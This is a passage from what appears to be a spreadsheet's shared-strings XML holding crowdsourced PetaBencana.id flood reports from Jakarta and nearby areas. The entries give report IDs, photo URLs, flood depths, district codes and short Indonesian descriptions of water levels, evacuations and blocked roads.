    <t>68998110-03af-485e-9d0b-2a964163bf04</t>
  </si>
  <si>
    <t>https://images.petabencana.id/68998110-03af-485e-9d0b-2a964163bf04.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "910", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>fab2043d-9114-403e-b3c4-ff4e8ffc00cc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fab2043d-9114-403e-b3c4-ff4e8ffc00cc.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 193, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Butuh damkar buat evakuasi korban banjir</t>
  </si>
  <si>
    <t>4c0a5038-cbad-4a95-b131-2d9094f80a88</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4c0a5038-cbad-4a95-b131-2d9094f80a88.jpg</t>
  </si>
  <si>
    <t>Banjir Kav. Artha Kencana IX</t>
  </si>
  <si>
    <t>c57775f2-abf8-474c-950d-f37fa48151c5</t>
  </si>
  <si>
    <t>Banjir dekat kali Krukut</t>
  </si>
  <si>
    <t>9ec599b5-a5cc-4dd5-bb15-80f9fd515aed</t>
  </si>
  <si>
    <t>27140994-f599-4f84-b062-e5aeeb0ddc13</t>
  </si>
  <si>
    <t>https://images.petabencana.id/27140994-f599-4f84-b062-e5aeeb0ddc13.jpg</t>
  </si>
  <si>
    <t>Banjir di Perumahan Duta Kranji, Bintara, Bekasi Barat setinggi kurang lebih 45cm atau selutut orang dewasa</t>
  </si>
  <si>
    <t>3e1793ab-a9fa-438c-b0f4-ce90f0f258f9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3e1793ab-a9fa-438c-b0f4-ce90f0f258f9.jpg</t>
  </si>
  <si>
    <t>Banjir paraaah. Jl. Pondok Kacang putus total</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Djm6VsSijHp24sb1Vc8jPwRdBBBDp2xoJdE5OMmlh9JuQWKwaLHgktYZuaCLynunT10IacR8LtoqrnhIx6a8Qmytr3Ul6-mz4gG_G25R=s480-c</t>
  </si>
  <si>
    <t>terminal kampung rambutan banjir</t>
  </si>
  <si>
    <t>fa986aca-8cea-44f6-b6d8-a5dc31280a2f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fa986aca-8cea-44f6-b6d8-a5dc31280a2f.jpg</t>
  </si>
  <si>
    <t>Ini banjir yang kelihatan dr dlm rumah, diluar sedengkul dewasa</t>
  </si>
  <si>
    <t>9bf30d08-1ad9-4b98-b6fe-9c1de73d60a7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9bf30d08-1ad9-4b98-b6fe-9c1de73d60a7.jpg</t>
  </si>
  <si>
    <t>Alam Jaya</t>
  </si>
  <si>
    <t>Jati Uwung</t>
  </si>
  <si>
    <t>2bd83ce5-d32a-431f-9210-d63ed96ca139</t>
  </si>
  <si>
    <t>Banjir di komplek wisma tajur</t>
  </si>
  <si>
    <t>4b88568e-373f-4df6-a1f9-98aa402214c5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4b88568e-373f-4df6-a1f9-98aa402214c5.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 96, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Salah satu penyebab endapan Kali pesanggrahan gak pernah di bersihin lagi spt waktu itu, posisi kali pesanggrahan ada di belakang jalan ini</t>
  </si>
  <si>
    <t>a8aa5ce5-cd69-4e60-ac82-932473107787</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a8aa5ce5-cd69-4e60-ac82-932473107787.jpg</t>
  </si>
  <si>
    <t>Banjir di Kramatsari, pekalongan</t>
  </si>
  <si>
    <t>Bendan</t>
  </si>
  <si>
    <t>ef454b40-1e74-469d-975a-64eeda93a413</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ef454b40-1e74-469d-975a-64eeda93a413.jpg</t>
  </si>
  <si>
    <t>banjir setinggi paha</t>
  </si>
  <si>
    <t>44038376-61b9-48bd-887f-943f7f91ddeb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/44038376-61b9-48bd-887f-943f7f91ddeb.jpg</t>
  </si>
  <si>
    <t>Banjir setinggi dada orang dewasa. Sudah ada perahu karet untuk evakuasi. Warga masih mengungsi menyelamatkan barang</t>
  </si>
  <si>
    <t>0ea3ae20-dd8d-450c-8bc4-568217e496f8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0ea3ae20-dd8d-450c-8bc4-568217e496f8.jpg</t>
  </si>
  <si>
    <t>c9780963-1439-4faa-8c46-b5df55ee582c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c9780963-1439-4faa-8c46-b5df55ee582c.jpg</t>
  </si>
  <si>
    <t>Jembatan  yang ke arah SMP 287 , jalan  Syarbini 1 tenggelam, jadi akses ke warga Pinang Ranti Mansion 2 dan Griya Harmendal terhambat.</t>
  </si>
  <si>
    <t>4dff540e-2460-4e18-9f17-413c898eff0f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4dff540e-2460-4e18-9f17-413c898eff0f.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 150, "report_type": "flood" }</t>
  </si>
  <si>
    <t>RT6/15 Jakasampurna Bekasi</t>
  </si>
  <si>
    <t>b35e418e-a0f2-4a2c-996c-f6175268f783</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b35e418e-a0f2-4a2c-996c-f6175268f783.jpg</t>
  </si>
  <si>
    <t>Banjir Kasuari VII</t>
  </si>
  <si>
    <t>40197d1e-c46a-4299-a621-9d53d15c06e5</t>
  </si>
  <si>
    <t>Banjir di perumahan antilop Jaticempaka Pd Gede</t>
  </si>
  <si>
    <t>57403260-2604-4466-963d-7210148644ee</t>
  </si>
  <si>
    <t>Angin kencang akhir2 ini melanda daerah kami, sebelum hujan datang pasti ada angin kencang.. diharap pengendara lebih berhati hati #ungaran</t>
  </si>
  <si>
    <t>Klepu</t>
  </si>
  <si>
    <t>Pringapus</t>
  </si>
  <si>
    <t>f50d33d3-f894-4241-b51b-82994812de91</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f50d33d3-f894-4241-b51b-82994812de91.jpg</t>
  </si>
  <si>
    <t>Banjir belakang Presiden University air sudah sedada orang dewasa"</t>
  </si>
  <si>
    <t>Simpangan</t>
  </si>
  <si>
    <t>31187922-9673-4510-baaf-7f2d4c0418fa</t>
  </si>
  <si>
    <t>https://images.petabencana.id/31187922-9673-4510-baaf-7f2d4c0418fa.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2610", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sejak subuh di jalan kapuk muara</t>
  </si>
  <si>
    <t>b2c0c398-ecab-4724-bd02-55ef70b85579</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b2c0c398-ecab-4724-bd02-55ef70b85579.jpg</t>
  </si>
  <si>
    <t>{ "points": 3, "flood_depth": 200, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir lokasi di komplek IKPN Bintaro tinggi air sekitar 3 meter banyak rumah yang tenggelam,kekurangan kapal untuk evakuasi warga sekitar</t>
  </si>
  <si>
    <t>a8149223-8a7b-4b7b-8a8f-3abc145affae</t>
  </si>
  <si>
    <t>banjir terparah yg prnh daerah ini alami</t>
  </si>
  <si>
    <t>Sangiang Jaya</t>
  </si>
  <si>
    <t>5f9f512a-63d8-4fc1-b78e-a977629fd3ff</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5f9f512a-63d8-4fc1-b78e-a977629fd3ff.jpg</t>
  </si>
  <si>
    <t>4e208fc6-1fdc-4fbf-bf43-e906fb87448d</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "920", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir kiriman</t>
  </si>
  <si>
    <t>5b23837a-80e0-4f12-958c-a5c71957b6a5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5b23837a-80e0-4f12-958c-a5c71957b6a5.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1321", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Ketinggian air masih terus bertambah</t>
  </si>
  <si>
    <t>3f34d8d9-9b09-4bc7-97e9-c6861d99ecb7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3f34d8d9-9b09-4bc7-97e9-c6861d99ecb7.jpg</t>
  </si>
  <si>
    <t>70877556-d6ce-4c28-8e4e-022013e3bbe7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/70877556-d6ce-4c28-8e4e-022013e3bbe7.jpg</t>
  </si>
  <si>
    <t>Ko wandi kos, Cikarang, Banjir parah</t>
  </si>
  <si>
    <t>67252858-0ffe-4977-a5a4-38c8039ec7cb</t>
  </si>
  <si>
    <t>Area dalam jalan menurun Gang Shinta - Larangan Utara, tembusan Perumahan Taman Asri banjir setinggi perut orang dewasa.</t>
  </si>
  <si>
    <t>3ffb5bef-45ca-487d-bcaa-deaabdd6a3d4</t>
  </si>
  <si>
    <t>Banjir Sebetis orang dewasa, sulit di lalui kendaraan motor</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/o9Vjmv24NyXfEiDE8w1k8y6Vp9I93w1wVl4OKTfnJ9_GPtrHMhiS4h-l9iTUsG-fR5Fo7B80mqb0sqnlztDt0a_xJYy8TIJ2ov3ZuXe_fuM=s480-c</t>
  </si>
  <si>
    <t>#BanjirKecil depan pintu masuk lippo mall kemang</t>
  </si>
  <si>
    <t>34a01cc5-fdce-466a-b98c-9e7087df5ec4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/34a01cc5-fdce-466a-b98c-9e7087df5ec4.jpg</t>
  </si>
  <si>
    <t>Komplek green garden blok D, ketinggian beragam mulai dr semata kaki s.d sedengkul</t>
  </si>
  <si>
    <t>e8b9cf01-f148-4788-ae21-48ca162c96d2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e8b9cf01-f148-4788-ae21-48ca162c96d2.jpg</t>
  </si>
  <si>
    <t>a417802f-872d-4669-97e3-df335a147910</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a417802f-872d-4669-97e3-df335a147910.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 90, "report_type": "flood" }</t>
  </si>
  <si>
    <t>#banjir taman duta Cimanggis, Depok</t>
  </si>
  <si>
    <t>Cisalak</t>
  </si>
  <si>
    <t>58fe7db6-c5b1-49c4-8538-e92344018dec</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1889", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Daerah SMA 9 Jakarta banjir sepinggang</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/l4_rqG48n64n_2vZLgVdVWcYVKUcStuAv_2I59GB9SeN1sISbZiQPRjc_7pshs5kKQ2XmXx7MB5I2qDw9crxmlSQMp6xBhCeTqF9qamZxA=s480-c</t>
  </si>
  <si>
    <t>banjir TL</t>
  </si>
  <si>
    <t>4ad14765-7705-44d1-9180-44e7e7fff01f</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1856", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Rumah saya dan tetangga saya banjir, dan tidak ada air bersih ??</t>
  </si>
  <si>
    <t>458515b3-b2c9-42aa-a279-b28abb3365a0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/458515b3-b2c9-42aa-a279-b28abb3365a0.jpg</t>
  </si>
  <si>
    <t>1380e3b5-db2c-4ad3-bcdf-1cee2f4aaeb8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1380e3b5-db2c-4ad3-bcdf-1cee2f4aaeb8.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 115, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Di luar rumah sekitar 1 meter, gambar buram dikarena hp ditutup dgn plastik</t>
  </si>
  <si>
    <t>2cec94ed-cddd-4678-a767-4249e3f3a9d8</t>
  </si>
  <si>
    <t>Dekat SPBU Perumahan Ubud. Sekitar 0630 tadi pagi 20 Feb 2021</t>
  </si>
  <si>
    <t>831073c4-cfbb-4480-9392-68d04e15aee7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/831073c4-cfbb-4480-9392-68d04e15aee7.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 124, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Parah mobil hanyut</t>
  </si>
  <si>
    <t>134b6c56-eb93-4f1b-9da5-5542ec8dada8</t>
  </si>
  <si>
    <t>GEBYURAN. PUKUL 0700 TADI PAGI</t>
  </si>
  <si>
    <t>e8f4793f-4b86-49a1-9388-04b319a49db7</t>
  </si>
  <si>
    <t>Banjir semata kaki lebih</t>
  </si>
  <si>
    <t>cfad7be0-12fc-45e0-bb38-e5951b18885a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cfad7be0-12fc-45e0-bb38-e5951b18885a.jpg</t>
  </si>
  <si>
    <t>Banjir perumahn pondok timur indah, jatimulya tambun selatan belasi 17510</t>
  </si>
  <si>
    <t>75239a22-9f22-4c86-8e91-6804e994e866</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1607", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir setinggi pinggang</t>
  </si>
  <si>
    <t>1d475939-0bf0-4772-b22e-9a0cd44bed84</t>
  </si>
  <si>
    <t>15 CM di Perempatan BCA DHI</t>
  </si>
  <si>
    <t>b2d7ca3a-0c90-4de4-994a-67eaa326d214</t>
  </si>
  <si>
    <t>Banjir selutut org dewasa, hujan gerimis</t>
  </si>
  <si>
    <t>e37aede9-6f70-49fc-9e3c-7cd496aa453a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e37aede9-6f70-49fc-9e3c-7cd496aa453a.jpg</t>
  </si>
  <si>
    <t>356b1d48-dd29-47d2-91c0-c08304b8e172</t>
  </si>
  <si>
    <t>Banjir di sekitar Galaxy</t>
  </si>
  <si>
    <t>93c763d8-9791-40ba-bd10-7f5cb1d203c6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/93c763d8-9791-40ba-bd10-7f5cb1d203c6.jpg</t>
  </si>
  <si>
    <t>0603ce12-c28d-48a4-a82d-fdd649a51397</t>
  </si>
  <si>
    <t>Jalan surilang dibalakang waduk terendam 50cm akses keluar masuk tidak bisa</t>
  </si>
  <si>
    <t>dfbedc16-81c2-42bd-aac2-c96e9e49f25d</t>
  </si>
  <si>
    <t>Kemang selatan banji</t>
  </si>
  <si>
    <t>7b997906-5a8f-469f-b55a-4a877e0c6a99</t>
  </si>
  <si>
    <t>bisa lewat semanan puter balik bawah flyover, mungkin coba lewat jalan lain</t>
  </si>
  <si>
    <t>6cba548d-e83a-40ed-840d-52dfe950ac79</t>
  </si>
  <si>
    <t>Terjebak di Masjid Baiturahman,  kurang lebih 6 orang dari jam 2 dink hair,  belum sarapan</t>
  </si>
  <si>
    <t>980b5543-be0f-4977-96a3-636c111614fd</t>
  </si>
  <si>
    <t>banjir 40-55cm, kalau mau ke arah bojong bisa lewat al barkah puter balik bawah flyover</t>
  </si>
  <si>
    <t>7b8763ae-8dbf-478b-b5ae-1e5463cc3686</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7b8763ae-8dbf-478b-b5ae-1e5463cc3686.jpg</t>
  </si>
  <si>
    <t>7885a72a-5006-4d4f-a708-22f6eb99e568</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7885a72a-5006-4d4f-a708-22f6eb99e568.jpg</t>
  </si>
  <si>
    <t>{ "points": 3, "flood_depth": 89, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1234", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>2f25102a-0cf0-47e1-b6c2-be57d5e7d72a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2f25102a-0cf0-47e1-b6c2-be57d5e7d72a.jpg</t>
  </si>
  <si>
    <t>Banjir di jl. Kh Ahmad Dahlan, gondrong, petir, cipondoh, tangerang. Luapan dari kali angke. Ketinggian dr 20-45cm.</t>
  </si>
  <si>
    <t>05dc1b79-bbdc-492e-ae6f-8a2c44a3f274</t>
  </si>
  <si>
    <t>https://images.petabencana.id/05dc1b79-bbdc-492e-ae6f-8a2c44a3f274.jpg</t>
  </si>
  <si>
    <t>Perumnas bumi telukjambe karawang</t>
  </si>
  <si>
    <t>Sukaharja</t>
  </si>
  <si>
    <t>Telukjambe Timur</t>
  </si>
  <si>
    <t>835ee0e0-f4b1-4fe8-99b6-b13bf8fa69f0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/835ee0e0-f4b1-4fe8-99b6-b13bf8fa69f0.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2355", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Baru naik banjirnya</t>
  </si>
  <si>
    <t>5ab55bd6-37aa-4fcc-946e-2dd755cfcd5a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5ab55bd6-37aa-4fcc-946e-2dd755cfcd5a.jpg</t>
  </si>
  <si>
    <t>Permukaan air 88cm, arus deras</t>
  </si>
  <si>
    <t>1162e28d-332f-41fb-9277-3cf1226fac4c</t>
  </si>
  <si>
    <t>Di benhill sebetis ketinggian airnya</t>
  </si>
  <si>
    <t>393a0bdd-3a89-4c7d-bb5e-41f135e13473</t>
  </si>
  <si>
    <t>https://images.petabencana.id/393a0bdd-3a89-4c7d-bb5e-41f135e13473.jpg</t>
  </si>
  <si>
    <t>Banjir di perumahan grand prima bintara, bekasi</t>
  </si>
  <si>
    <t>1f2c400f-217a-47d0-ba30-62abda868a8f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1f2c400f-217a-47d0-ba30-62abda868a8f.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 36, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir melanda sejak jam 1 pagi dan tidak surut karena kali kecil tertutup tanah dan bangunan yg longsor. Sedang ada penanganan dr PPSU</t>
  </si>
  <si>
    <t>530368b6-fef7-4062-a33c-9160eee18ce9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/530368b6-fef7-4062-a33c-9160eee18ce9.jpg</t>
  </si>
  <si>
    <t>Banjir dan longsor</t>
  </si>
  <si>
    <t>ff29e5f2-9743-49e1-984e-b9cdf1fc8ef2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ff29e5f2-9743-49e1-984e-b9cdf1fc8ef2.jpg</t>
  </si>
  <si>
    <t>Pintu air dekat rumah jebol.air sudah mulai masuk rumah</t>
  </si>
  <si>
    <t>Waluya</t>
  </si>
  <si>
    <t>cff8e1b2-6058-4dc1-b1aa-5837a4b3c947</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cff8e1b2-6058-4dc1-b1aa-5837a4b3c947.jpg</t>
  </si>
  <si>
    <t>30cm lah depan rptra aja, ke arah kali nanti juga banjir lagi.</t>
  </si>
  <si>
    <t>3ea4392d-3f2e-4a1d-b0a6-3886a1f5579e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3ea4392d-3f2e-4a1d-b0a6-3886a1f5579e.jpg</t>
  </si>
  <si>
    <t>Banjir di perumahan BHP</t>
  </si>
  <si>
    <t>51c87939-dbf6-454c-a3fe-7c7f62a214d0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/51c87939-dbf6-454c-a3fe-7c7f62a214d0.jpg</t>
  </si>
  <si>
    <t>Taman kota rt. 016 rw. 05</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/UhmITLiDbSsEU7r9ig3PSVcbMaKYYgF6YkUAH9kx8JmjM9-9T-LqbCE9m2NFSmV67f-_WwlQ2nEXWaqgM_30NayUaXnBhFM3t29eUnOmoA=s480-c</t>
  </si>
  <si>
    <t>Banjir di Jln.Kolonel Sutomo II Kel. Kebon Pala Kecamatan Makasar. Tolong dikirim bantuan agar air cepat surut.Terima kasih.</t>
  </si>
  <si>
    <t>8ea69662-0466-475b-ac36-16b3cfa6e2ec</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8ea69662-0466-475b-ac36-16b3cfa6e2ec.jpg</t>
  </si>
  <si>
    <t>Kedalama sekitar 130 - 150 di dalam komplek dosen ikip</t>
  </si>
  <si>
    <t>163b90db-4c40-4639-80c0-875b1616c0e3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/163b90db-4c40-4639-80c0-875b1616c0e3.jpg</t>
  </si>
  <si>
    <t>5a6b82fb-5c0c-4edb-b99f-2a01ea8c9cd9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5a6b82fb-5c0c-4edb-b99f-2a01ea8c9cd9.jpg</t>
  </si>
  <si>
    <t>Air terus bertambah</t>
  </si>
  <si>
    <t>Karangbaru</t>
  </si>
  <si>
    <t>f84f0914-309f-47d5-93cd-badaac098844</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f84f0914-309f-47d5-93cd-badaac098844.jpg</t>
  </si>
  <si>
    <t>adeeb386-9858-4caf-a4a4-0deac8b76d2c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/adeeb386-9858-4caf-a4a4-0deac8b76d2c.jpg</t>
  </si>
  <si>
    <t>banjir dengar ketinggian 10-60 cm. memasuki beberapa rumah warga.</t>
  </si>
  <si>
    <t>8b741771-7d5c-4419-aa77-7aebadbff794</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8b741771-7d5c-4419-aa77-7aebadbff794.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 33, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Sebrang sungai apartemen puri park view</t>
  </si>
  <si>
    <t>e821bbfe-14b4-4f77-b56b-323f2182d539</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e821bbfe-14b4-4f77-b56b-323f2182d539.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 79, "report_type": "flood" }</t>
  </si>
  <si>
    <t>komplek wisma tajur banjir hampir 1 meter dan masih terus naik</t>
  </si>
  <si>
    <t>64894013-a770-43fd-bb9f-930feb53609d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/64894013-a770-43fd-bb9f-930feb53609d.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1235", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir mulai dari semalam pukul 00.00 karena hujan deras disertai petir sehingga membuat air naik dengan cepat</t>
  </si>
  <si>
    <t>be546a37-3605-435b-8347-6dcc349c970f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/be546a37-3605-435b-8347-6dcc349c970f.jpg</t>
  </si>
  <si>
    <t>semoga cepat di atasi yah</t>
  </si>
  <si>
    <t>f467dfba-bff4-4c01-ab6b-cb3927b0a146</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f467dfba-bff4-4c01-ab6b-cb3927b0a146.jpg</t>
  </si>
  <si>
    <t>Kompleks Bumi Harapan Permai (BHP), Dukuh, Kramatjati banjir 50cm, saat ini mati listrik.</t>
  </si>
  <si>
    <t>e577f8fe-9902-4350-b322-2ccf2ec5c2ce</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e577f8fe-9902-4350-b322-2ccf2ec5c2ce.jpg</t>
  </si>
  <si>
    <t>Kali pesanggrahandekat meruya ilir raya mau luber tolong tim bencana disiagakan</t>
  </si>
  <si>
    <t>8d1b41e9-4084-4b8c-8918-9b680171bc34</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8d1b41e9-4084-4b8c-8918-9b680171bc34.jpg</t>
  </si>
  <si>
    <t>Banjir telah menggenangi wilayah pekalongan barat dari 3minggu yang lalu.</t>
  </si>
  <si>
    <t>Limbangan</t>
  </si>
  <si>
    <t>96b39762-ad03-4bdb-b513-22e8bec42332</t>
  </si>
  <si>
    <t>https://images.petabencana.id/96b39762-ad03-4bdb-b513-22e8bec42332.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "881", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Sering banjir ketika hujan besar, tetapi alhamdulillah ceoat surut</t>
  </si>
  <si>
    <t>c4f82e54-5455-4447-b015-e32b5f810785</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c4f82e54-5455-4447-b015-e32b5f810785.jpg</t>
  </si>
  <si>
    <t>Ciledug indah 2 blok E8 dan sepanjang nya banjir sedengkul. Kemungkinan sampai sore air akan terus meluap</t>
  </si>
  <si>
    <t>c918a102-6e98-43e9-870c-fb0bca233231</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c918a102-6e98-43e9-870c-fb0bca233231.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 151, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Jl. Kemang Selatan IV No. 79</t>
  </si>
  <si>
    <t>831c158b-d9b3-4e98-ab8b-bb55319652b4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/831c158b-d9b3-4e98-ab8b-bb55319652b4.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 160, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Foto jam 7, skrg pager ud ga kliatan. Kalau di jalan sekepala orang.</t>
  </si>
  <si>
    <t>19f4ce46-ebe9-4393-bdf1-e074abd573e2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/19f4ce46-ebe9-4393-bdf1-e074abd573e2.jpg</t>
  </si>
  <si>
    <t>34b64426-cba2-4a13-8eaf-5112bafc4ea3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/34b64426-cba2-4a13-8eaf-5112bafc4ea3.jpg</t>
  </si>
  <si>
    <t>f93b5f9b-c0f8-4753-8f68-85e2f5a1a8e9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f93b5f9b-c0f8-4753-8f68-85e2f5a1a8e9.jpg</t>
  </si>
  <si>
    <t>{ "points": 3, "flood_depth": 170, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Jl. Kemang Selatan 12 (YDPP)</t>
  </si>
  <si>
    <t>64f5d1b7-3639-4f56-bb69-dd9dd6bd8e8b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/64f5d1b7-3639-4f56-bb69-dd9dd6bd8e8b.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 179, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "2474", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di daerah pinggir kali ciliwung</t>
  </si>
  <si>
    <t>Pengadegan</t>
  </si>
  <si>
    <t>5d4d87d8-d851-4cd3-bd72-8be4ee2c8636</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5d4d87d8-d851-4cd3-bd72-8be4ee2c8636.jpg</t>
  </si>
  <si>
    <t>Butuh bantuan berupa makanan dan pakaian buat sehari pakai aja</t>
  </si>
  <si>
    <t>8d2cb8b5-3182-4d16-912f-22cdb2864880</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8d2cb8b5-3182-4d16-912f-22cdb2864880.jpg</t>
  </si>
  <si>
    <t>Kendaraan roda 4 sebaiknya hindari Jalan Zamrud Utara. Pada beberapa titik kemacetan karena banjir. Hingga saat ini curah hujan msh tinggi</t>
  </si>
  <si>
    <t>8ba36399-3ad1-4d3c-9fd9-4fdbf2e9ee18</t>
  </si>
  <si>
    <t>Jl. Pusdiklat Depnaker depan masjid Soeprapto Air sudah limpas tanggul  masuk ke jalan &amp; ke dalam kampung Tipala"</t>
  </si>
  <si>
    <t>ff44e070-623d-44f7-a323-73f84d24594f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ff44e070-623d-44f7-a323-73f84d24594f.jpg</t>
  </si>
  <si>
    <t>Penyebab utama banjir di komplek malinda jatisari ini adalah karena saluran airnya diperkecil wktu pembangunan jalan. 30an rumah terdampak</t>
  </si>
  <si>
    <t>d841d61f-a9c4-4364-a30f-b16fc7f64a20</t>
  </si>
  <si>
    <t>Banjir taman duta depok, ketinggian 60-100cm</t>
  </si>
  <si>
    <t>7ce4469b-2293-4839-8052-e49f21daed7d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7ce4469b-2293-4839-8052-e49f21daed7d.jpg</t>
  </si>
  <si>
    <t>banjir setinngi leher orang dewasa belakang kompleks transmigrasi butuh evakuasi perahu</t>
  </si>
  <si>
    <t>94e3ef24-b88f-4311-b514-7e0a10b48723</t>
  </si>
  <si>
    <t>https://images.petabencana.id/94e3ef24-b88f-4311-b514-7e0a10b48723.jpg</t>
  </si>
  <si>
    <t>Banjir Jl. H.Emuntipala Kp.Makasar</t>
  </si>
  <si>
    <t>b62edb33-7a48-4c72-805f-d8400a560821</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b62edb33-7a48-4c72-805f-d8400a560821.jpg</t>
  </si>
  <si>
    <t>Depan Pos Security Perumahan Setu Indah, Kp Kramat, Kel.Setu Kec.Cipayung Jaktim.</t>
  </si>
  <si>
    <t>3153cf35-2e03-4673-88bb-eff6c23d8ba6</t>
  </si>
  <si>
    <t>Tidak sempat memfoto karna terburu buru</t>
  </si>
  <si>
    <t>7c2e91f9-e207-4ee1-a41e-6ae9e0bd0495</t>
  </si>
  <si>
    <t>Makin naik</t>
  </si>
  <si>
    <t>e5651d0e-bc2e-46dc-83a7-49ff8cf54b52</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e5651d0e-bc2e-46dc-83a7-49ff8cf54b52.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 120, "report_type": "flood" }</t>
  </si>
  <si>
